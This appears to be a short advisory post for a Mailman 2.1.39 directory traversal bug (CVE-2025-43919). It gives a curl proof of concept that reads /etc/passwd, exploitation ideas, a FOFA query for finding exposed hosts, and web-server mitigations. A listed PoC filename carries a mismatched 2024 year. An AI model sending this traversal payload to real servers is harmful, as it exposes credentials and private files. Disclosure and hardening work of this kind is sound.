A new vulnerability has been discovered in GNU Mailman 2.1.39, bundled with cPanel/WHM, allowing unauthenticated remote attackers to read arbitrary files on the server via a directory traversal flaw.### 🚨 CVE-2025-43919: Directory Traversal in GNU Mailman 2.1.39 (cPanel/WHM)
> A new vulnerability has been discovered in GNU Mailman 2.1.39, bundled with cPanel/WHM, allowing unauthenticated remote attackers to read arbitrary files on the server via a directory traversal flaw.
📌 **Vulnerability Summary:**
- **Type**: `Directory Traversal` (Unauthenticated)
- **Component**: `private.py` CGI script
- **Affected Endpoint**: `/mailman/private/mailman`
- **Impact**: Disclosure of files like `/etc/passwd`, `.mbox archives`, and `Mailman configs`
- **CVSS Score**: `5.8 (Medium)`
- **CVE ID**: `CVE-2025-43919`
Status: No official patch (Mailman 2.1.x is EOL)
🔥 Proof of Concept:
```
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
```
🧨 Exploitation Scenarios:
- Dump `/etc/passwd`, `configs`, or `mailbox files`
- Leak credentials and sensitive archives
- Chain with other bugs for RCE or escalation
🛡️ Mitigations:
Block access to `/mailman/private` at the web server level:
```
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
```
Or in Nginx:
```
location /mailman/private {
deny all;
return 403;
}
```
⬆️ Migrate to **Mailman** **3.x — 2.x** is EOL and lacks modern protections
🔍 FOFA Query : [app="Mailman"](https://en.fofa.info/result?qbase64=YXBwPSJNYWlsbWFuIg%3D%3D)
📚 Learn more, share responsibly, and keep your infra secure.
🔒 Follow for more **real-world** CVEs, **PoCs**, and **hardening** tips:
👉 [@cybersecplayground](https://t.me/cybersecplayground)
`#bugbounty` `#infosec` `#exploit` `#pentest` `#cve2025` `#directorytraversal` `#linuxsecurity`
[4.0K] /data/pocs/66e720ad17cc14d5b730ec0224cf22e54e8a28d7
├── [1.3K] cve_2024_43919_poc.py
├── [1.1K] LICENSE
└── [1.7K] README.md
0 directories, 3 files